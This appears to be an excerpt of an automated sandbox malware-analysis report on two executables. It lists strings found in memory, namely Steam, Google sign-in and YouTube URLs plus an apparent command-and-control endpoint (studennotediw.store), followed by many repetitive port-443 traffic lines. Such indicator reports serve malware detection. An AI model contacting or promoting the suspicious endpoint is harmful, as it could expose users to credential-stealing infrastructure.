Source: 4db5303091.exe, 00000019.00000003.2829680782.0000000000E7F000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031297197.0000000000E23000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/points/shop/
Source: 4db5303091.exe, 00000019.00000003.2829680782.0000000000E7F000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031297197.0000000000E23000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: 4db5303091.exe, 00000019.00000003.2829680782.0000000000E7F000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031297197.0000000000E23000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/stats/
Source: 4db5303091.exe, 00000019.00000003.2829680782.0000000000E7F000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031297197.0000000000E23000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: 4db5303091.exe, 00000019.00000003.2829680782.0000000000E7F000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031297197.0000000000E23000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: 4db5303091.exe, 00000036.00000002.3037268767.0000000000D95000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031333435.0000000000D95000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://studennotediw.store:443/api
Source: 4db5303091.exe, 00000019.00000002.2848280275.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000003.2829967396.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: 4db5303091.exe, 00000019.00000003.2829967396.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/recaptcha/
Source: 4db5303091.exe, 00000019.00000002.2848280275.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000003.2829967396.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: 4db5303091.exe, 00000019.00000002.2848280275.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000003.2829967396.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: 4db5303091.exe, 00000019.00000003.2829680782.0000000000E7F000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031297197.0000000000E23000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: 4db5303091.exe, 00000019.00000002.2848280275.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000003.2829967396.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com
Source: 4db5303091.exe, 00000019.00000002.2848280275.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000003.2829967396.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: cb428cafc9.exe, 00000045.00000003.4391491029.000000000156A000.00000004.00000020.00020000.00000000.sdmp, cb428cafc9.exe, 00000045.00000003.4391890908.0000000001573000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/ee&
Source: cb428cafc9.exe, 00000007.00000003.2621215425.0000000000DC4000.00000004.00000020.00020000.00000000.sdmp, cb428cafc9.exe, 0000001A.00000002.4395413457.0000000001898000.00000004.00000020.00020000.00000000.sdmp, cb428cafc9.exe, 0000001A.00000003.3160393174.00000000017D4000.00000004.00000020.00020000.00000000.sdmp, cb428cafc9.exe, 0000001A.00000002.4395882017.00000000018CA000.00000004.00000020.00020000.00000000.sdmp, cb428cafc9.exe, 0000001A.00000003.4392034554.00000000018CA000.00000004.00000020.00020000.00000000.sdmp, cb428cafc9.exe, 0000001A.00000003.4391191294.00000000018CA000.00000004.00000020.00020000.00000000.sdmp, cb428cafc9.exe, 0000001A.00000003.4392651870.00000000018CA000.00000004.00000020.00020000.00000000.sdmp, cb428cafc9.exe, 00000045.00000003.3083686361.00000000014D4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown Network traffic detected: HTTP traffic on port 49932 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49971
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49970
Source: unknown Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown Network traffic detected: HTTP traffic on port 49943 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49968
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49965
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49964
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49963
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown Network traffic detected: HTTP traffic on port 50015 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49933 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49959
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown Network traffic detected: HTTP traffic on port 49921 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49956
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49955
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49954
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49952
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49950
Source: unknown Network traffic detected: HTTP traffic on port 49944 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49910 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 49955 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49949
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49948
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49947
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49946
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49944
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49943
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown Network traffic detected: HTTP traffic on port 49945 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 49968 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown Network traffic detected: HTTP traffic on port 49885 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49899
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49898
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49897
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49895
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49893
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49892
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49897 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49911 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49889
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49888
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49886
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49885
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49882
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49881
Source: unknown Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49956 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49878
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49998
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown Network traffic detected: HTTP traffic on port 49923 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49870
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49988
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49987
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49906 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49975 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49929 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49964 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50128 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49918 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49930 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49963 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50128
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown Network traffic detected: HTTP traffic on port 49895 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49941 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49965 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49919 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49953 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49931 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49949 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50053
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50056
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49984 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49881 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49950 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50010 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50056 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49893 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49915 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49972 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49938 -> 443
